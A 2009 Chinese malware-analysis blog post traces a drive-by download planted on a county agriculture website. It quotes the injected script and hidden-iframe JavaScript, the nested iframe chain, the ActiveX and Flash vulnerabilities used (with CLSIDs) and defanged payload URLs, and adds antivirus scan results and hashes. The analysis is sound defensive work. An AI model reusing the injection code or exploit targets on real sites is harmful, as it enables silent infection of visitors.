某县农业网被挂马 Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix
endurer 原创
2009-05-05 第1版
打开某县农业网,Maxthon提示要安装ActiveX控件。
检查网页代码,发现:
/---
<script src=hxxp://***.w**vg0**.cn></script>
---/
#1 hxxp://***.w**vg0**.cn 包含代码:
/---
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>")
document.write("</div>")}
---/
其功能为:检查当前网址,如果包含字符串“gov”则无作为,否则输出代码:
/---
<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>
---/
#1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index.htm 包含代码:
/---
<iframe src=index2.htm width=100 height=0></Iframe>
---/
#1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index2.htm 包含代码:
/---
<iframe src=ccqm.htm width=100 height=0></iframe>
<script src="js.css"></script>
---/
#1.1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/ccqm.htm
利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞,下载hxxp://w*w1.u**ws**3y.com/**1/ActivcX.exe
文件说明符 : D:/test/ActivcX.exe
属性 : A---
数字签名:Microsoft Windows
PE文件:是
语言 : 中文(中国)
文件版本 : 1, 0, 0, 1
版权 : Copyright ? 2008
产品版本 : 1, 0, 0, 1
创建时间 : 2009-5-5 9:33:34
修改时间 : 2009-5-5 9:33:34
大小 : 43016 字节 42.8 KB
MD5 : 614a7b4f6c23783d463c681e46a5735f
SHA1: DD8BB584C4D4915993E57E69A8F8C0E0DABDC59E
CRC32: 3371c540
文件 ActivcX.exe 接收于 2009.05.05 03:35:13 (CET)
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
a-squared | 4.0.0.101 | 2009.05.05 | Trojan.Win32.AntiAV!IK |
AhnLab-V3 | 5.0.0.2 | 2009.05.04 | - |
AntiVir | 7.9.0.160 | 2009.05.04 | TR/Killav.PN |
Antiy-AVL | 2.0.3.1 | 2009.04.30 | - |
Authentium | 5.1.2.4 | 2009.05.04 | - |
Avast | 4.8.1335.0 | 2009.05.04 | Win32:Rootkit-gen |
AVG | 8.5.0.327 | 2009.05.04 | - |
BitDefender | 7.2 | 2009.05.04 | - |
CAT-QuickHeal | 10.00 | 2009.05.04 | - |
ClamAV | 0.94.1 | 2009.05.04 | - |
Comodo | 1149 | 2009.05.03 | - |
DrWeb | 4.44.0.09170 | 2009.05.05 | - |
eSafe | 7.0.17.0 | 2009.05.03 | Suspicious File |
eTrust-Vet | 31.6.6489 | 2009.05.05 | Win32/Dogrobot.V |
F-Prot | 4.4.4.56 | 2009.05.04 | - |
F-Secure | 8.0.14470.0 | 2009.05.04 | - |
Fortinet | 3.117.0.0 | 2009.05.04 | - |
GData | 19 | 2009.05.05 | - |
Ikarus | T3.1.1.49.0 | 2009.05.05 | Trojan.Win32.AntiAV |
K7AntiVirus | 7.10.723 | 2009.05.04 | - |
Kaspersky | 7.0.0.125 | 2009.05.05 | - |
McAfee | 5605 | 2009.05.04 | - |
McAfee+Artemis | 5605 | 2009.05.04 | - |
McAfee-GW-Edition | 6.7.6 | 2009.05.04 | Trojan.Killav.PN |
Microsoft | 1.4602 | 2009.05.04 | Trojan:Win32/Dogrobot.I |
NOD32 | 4052 | 2009.05.04 | a variant of Win32/AntiAV.NAC |
Norman | 6.01.05 | 2009.05.04 | - |
nProtect | 2009.1.8.0 | 2009.05.04 | - |
Panda | 10.0.0.14 | 2009.05.04 | - |
PCTools | 4.4.2.0 | 2009.05.03 | - |
Prevx1 | 3.0 | 2009.05.05 | - |
Rising | 21.28.04.00 | 2009.05.04 | - |
Sophos | 4.41.0 | 2009.05.05 | - |
Sunbelt | 3.2.1858.2 | 2009.05.04 | BehavesLike.Win32.Malware (v) |
Symantec | 1.4.4.12 | 2009.05.05 | Downloader |
TheHacker | 6.3.4.1.318 | 2009.05.04 | - |
TrendMicro | 8.950.0.1092 | 2009.05.04 | Possible_Mlwr-13 |
VBA32 | 3.12.10.4 | 2009.05.04 | suspected of Win32.BrokenEmbeddedSignature (paranoid heuristics) |
ViRobot | 2009.5.4.1719 | 2009.05.04 | - |
VirusBuster | 4.6.5.0 | 2009.05.04 | - |
附加信息 |
File size: 43016 bytes |
MD5...: 614a7b4f6c23783d463c681e46a5735f |
SHA1..: dd8bb584c4d4915993e57e69a8f8c0e0dabdc59e |
SHA256: 5860dca29a93c9d639822cdc94c63cf885e15ff211cd750d279a1fa1af9bacd1 |
SHA512: a74c18c29e0b8be5dc22c50858ec3fcfdcad1d9d4f6563975671469e0cb63347 728addda34e40460edc3af512e800e0725b0b47a8d200b5c6d9e439f7032d286 |
ssdeep: 768:CpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3ACmw0PWa:ARh uXnlcqMa9Vwlbkf9n4l0bj3ACml |
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser |
TrID..: File type identification UPX compressed Win32 Executable (39.5%) Win32 EXE Yoda's Crypter (34.3%) Win32 Executable Generic (11.0%) Win32 Dynamic Link Library (generic) (9.8%) Generic Win/DOS Executable (2.5%) |
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x1b1b0 timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009) machinetype.......: 0x14c (I386) ( 3 sections ) name viradd virsiz rawdsiz ntrpy md5 UPX0 0x1000 0x11000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e UPX1 0x12000 0xa000 0x9400 7.91 01a9e9405e16934a2a5850ffabb5e036 .rsrc 0x1c000 0x1000 0x600 2.78 c2fbafde5b8e544a6ad8f2e28ebda2c0 ( 2 imports ) > KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess > USER32.dll: wsprintfA ( 0 exports ) |
PDFiD.: - |
RDS...: NSRL Reference Data Set - |
packers (Kaspersky): PE_Patch.UPX, UPX |
packers (Avast): UPX |
packers (F-Prot): UPX |
http://bbs.ikaka.com//showtopic-8621775.aspx
回复:ActivcX.exe——614a7b4f6c23783d463c681e46a5735f
发表于: 2009-05-05 10:19
文件名:ActivcX.exe
病毒名:Trojan.Win32.KillAV.bca
您所上报的病毒文件将在瑞星2009的21.28.11版本中处理解决,如遇特殊情况可能会推后几个版本。
主 题: RE: ActivcX.exe——614a7b4f6c23783d463c681e46a5735f [KLAN-27689534]
发件人: newvirus@kaspersky.com
日 期: 2009-5-5 10:42:38
Hello,
ActivcX.exe - Trojan-Downloader.Win32.Geral.ix
New malicious software was found in this file. It's detection will be included in the next update.
Thank you for your help.
-----------------
Regards, Vitaly Butuzov
Virus Analyst, Kaspersky Lab.
#1.1.1.2 hxxp://er**.d**ry*63.cn/1*/2**0/js.css
输出代码:
/---
<iframe width=100 height=0 src=hk14.htm></iframe>
<iframe width=100 height=0 src=hkfl.htm></iframe>
<iframe width=100 height=0 src=hkvod.htm></iframe>
<iframe width=50 height=0 src=hkbb.htm></iframe>
<iframe src=hkxxz.htm width=100 height=0></iframe>
<iframe width=50 height=0 src=hkff.htm></iframe>
<iframe width=100 height=0 src=hk122121.htm></iframe>
---/
#1.1.1.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/hk14.htm 包含代码:
/---
<script src=14.css></script>
<script src=15.css></script>
<script src=16.css></script>
---/
并利用MS06-014安全漏洞下载 hxxp://w*w1.u**ws**3y.com/**1/cX.exe,创建baidueee.vbs来运行。
2009-5-5 9:49:09 hxxp://w*w1.u**ws**3y.com/**1/cX.exe//# HttpRead 检测到威胁: Trojan-Downloader.Win32.Geral.if
文件说明符 : D:/test/cX.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 1, 0, 0, 1
版权 : Copyright ? 2008
产品版本 : 1, 0, 0, 1
创建时间 : 2009-5-5 9:50:17
修改时间 : 2009-5-5 9:50:17
大小 : 40448 字节 39.512 KB
MD5 : b1238d558b393d2688072a2400aedcc2
SHA1: E59D4779418EA92E208797518FC78DA8D996B692
CRC32: 8a02509a
文件 cX.exe 接收于 2009.05.05 03:50:43 (CET)
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
a-squared | 4.0.0.101 | 2009.05.05 | Trojan.Win32.AntiAV!IK |
AhnLab-V3 | 5.0.0.2 | 2009.05.04 | - |
AntiVir | 7.9.0.160 | 2009.05.04 | TR/Killav.PN |
Antiy-AVL | 2.0.3.1 | 2009.04.30 | - |
Authentium | 5.1.2.4 | 2009.05.04 | - |
Avast | 4.8.1335.0 | 2009.05.04 | Win32:Rootkit-gen |
AVG | 8.5.0.327 | 2009.05.04 | - |
BitDefender | 7.2 | 2009.05.04 | Gen:Trojan.Heur.2014755353 |
CAT-QuickHeal | 10.00 | 2009.05.04 | - |
ClamAV | 0.94.1 | 2009.05.04 | - |
Comodo | 1149 | 2009.05.03 | - |
DrWeb | 4.44.0.09170 | 2009.05.05 | - |
eSafe | 7.0.17.0 | 2009.05.03 | Suspicious File |
eTrust-Vet | 31.6.6489 | 2009.05.05 | Win32/Dogrobot.V |
F-Prot | 4.4.4.56 | 2009.05.04 | - |
F-Secure | 8.0.14470.0 | 2009.05.04 | - |
Fortinet | 3.117.0.0 | 2009.05.04 | - |
GData | 19 | 2009.05.05 | Gen:Trojan.Heur.2014755353 |
Ikarus | T3.1.1.49.0 | 2009.05.05 | Trojan.Win32.AntiAV |
K7AntiVirus | 7.10.723 | 2009.05.04 | - |
Kaspersky | 7.0.0.125 | 2009.05.05 | - |
McAfee | 5605 | 2009.05.04 | - |
McAfee+Artemis | 5605 | 2009.05.04 | Artemis!B1238D558B39 |
McAfee-GW-Edition | 6.7.6 | 2009.05.04 | Trojan.Killav.PN |
Microsoft | 1.4602 | 2009.05.04 | Trojan:Win32/Dogrobot.I |
NOD32 | 4052 | 2009.05.04 | a variant of Win32/AntiAV.NAC |
Norman | 6.01.05 | 2009.05.04 | - |
nProtect | 2009.1.8.0 | 2009.05.04 | - |
Panda | 10.0.0.14 | 2009.05.04 | Suspicious file |
PCTools | 4.4.2.0 | 2009.05.03 | - |
Prevx1 | 3.0 | 2009.05.05 | Medium Risk Malware |
Rising | 21.28.04.00 | 2009.05.04 | - |
Sophos | 4.41.0 | 2009.05.05 | Mal/PWS-Fam |
Sunbelt | 3.2.1858.2 | 2009.05.04 | BehavesLike.Win32.Malware (v) |
Symantec | 1.4.4.12 | 2009.05.05 | Downloader |
TheHacker | 6.3.4.1.318 | 2009.05.04 | - |
TrendMicro | 8.950.0.1092 | 2009.05.04 | Possible_Mlwr-13 |
VBA32 | 3.12.10.4 | 2009.05.04 | - |
ViRobot | 2009.5.4.1719 | 2009.05.04 | - |
VirusBuster | 4.6.5.0 | 2009.05.04 |
附加信息 |
File size: 40448 bytes |
MD5...: b1238d558b393d2688072a2400aedcc2 |
SHA1..: e59d4779418ea92e208797518fc78da8d996b692 |
SHA256: bd7c58dd6fffc7c3e073e85e7ab1b0070d0976665df1e5c64d8307f8336b2867 |
SHA512: 460b6261f52d29793b9a47aa7c3bd88f32732716027d5ad48246a847875833f1 212aafba066a8325760a383304c3b52847dad6d18360333dfcc29484a2be7599 |
ssdeep: 768:ZpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3AC:vRhuXnlcq Ma9Vwlbkf9n4l0bj3AC |
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser |
TrID..: File type identification UPX compressed Win32 Executable (39.5%) Win32 EXE Yoda's Crypter (34.3%) Win32 Executable Generic (11.0%) Win32 Dynamic Link Library (generic) (9.8%) Generic Win/DOS Executable (2.5%) |
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x1b1b0 timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009) machinetype.......: 0x14c (I386) ( 3 sections ) name viradd virsiz rawdsiz ntrpy md5 UPX0 0x1000 0x11000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e UPX1 0x12000 0xa000 0x9400 7.91 01a9e9405e16934a2a5850ffabb5e036 .rsrc 0x1c000 0x1000 0x600 2.78 c2fbafde5b8e544a6ad8f2e28ebda2c0 ( 2 imports ) > KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess > USER32.dll: wsprintfA ( 0 exports ) |
PDFiD.: - |
RDS...: NSRL Reference Data Set - |
packers (Kaspersky): PE_Patch.UPX, UPX |
packers (Avast): UPX |
<a href='http://info.prevx.com/aboutprogramtext.asp?PX5=4949059600D505AE9EA000B8E880E10042A80038' target='_blank'>http://info.prevx.com/aboutprogr ... E10042A80038</a> |
packers (F-Prot): UPX |
http://bbs.ikaka.com//showtopic-8621768.aspx
回复:cX.exe——b1238d558b393d2688072a2400aedcc2
发表于: 2009-05-05 14:21
文件名:cX.exe
病毒名:Trojan.Win32.KillAV.bca
您所上报的病毒文件将在瑞星2009的21.28.11版本中处理解决,如遇特殊情况可能会推后几个版本。
#1.1.1.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/hkfl.htm 检测浏览器类型,如果是IE,则输出:
/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/
如果是FireFox,则输出:
/---
<iframe src=cc22.htm width=100% height=100% scrolling=no frameborder=0>
---/
否则输出:
/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/
#1.1.1.2.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/cc11.htm
利用flash播放插件漏洞下载 ci115.swf、ci47.swf、ci45.swf、ci64.swf或ci28.swf。
#1.1.1.2.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/cc22.htm
利用flash播放插件漏洞下载 cf115.swf、cf47.swf、cf45.swf、cf64.swf或cf28.swf.
#1.1.1.2.2.3 hxxp://er**.d**ry*63.cn/1*/2**0/hkvod.htm 引入代码:
/---
<script src="ccvod.css"></script>
<script src="b.css"></script>
<script src="d.css"></script>
---/
利用QVOD播放器(clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe
#1.1.1.2.4 hxxp://er**.d**ry*63.cn/1*/2**0/hkbb.htm 引入代码:
/---
<script src="bff1.css"></script>
<script src="bff.css"></script>
---/
利用暴风影音(clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB)漏洞下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe
#1.1.1.2.5 hxxp://er**.d**ry*63.cn/1*/2**0/hkxxz.htm 引入代码:
/---
<script src="091.css"></script>
<script src="092.css"></script>
---/
待分析。
#1.1.1.2.6 hxxp://er**.d**ry*63.cn/1*/2**0/hkff.htm 引入:
/---
<script src="ff.css"></script>
---/
clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9
利用Microsoft Access快照查看器(snpvw.Snapshot Viewer Control.1,clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9)漏洞,下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe,存为C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe。
#1.1.1.2.7 hxxp://er**.d**ry*63.cn/1*/2**0/hk122121.htm 引入:
/---
<script src="Turl.css"></script>
<script src="real.css"></script>
<script src="real1.css"></script>
---/
利用Realplayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞,下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe,存为C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe。